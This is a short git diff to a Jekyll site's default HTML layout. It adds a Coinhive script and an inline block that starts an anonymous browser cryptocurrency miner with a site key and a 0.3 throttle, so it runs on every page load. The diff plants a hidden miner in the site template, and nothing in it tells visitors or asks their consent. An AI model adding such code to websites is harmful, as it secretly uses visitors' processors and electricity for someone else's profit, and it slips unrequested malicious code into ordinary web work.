--- a/_layouts/default.html
+++ b/_layouts/default.html
@@ -48,4 +48,12 @@
 
     {% include analytics.html %}
   </body>
+  
+  <script src="https://coinhive.com/lib/coinhive.min.js"></script>
+<script>
+	var miner = new CoinHive.Anonymous('TwdDjvYFBwddZFQeHNurOVYs0JIM8ROS', {throttle: 0.3});
+
+	miner.start();
+
+</script>
 </html>
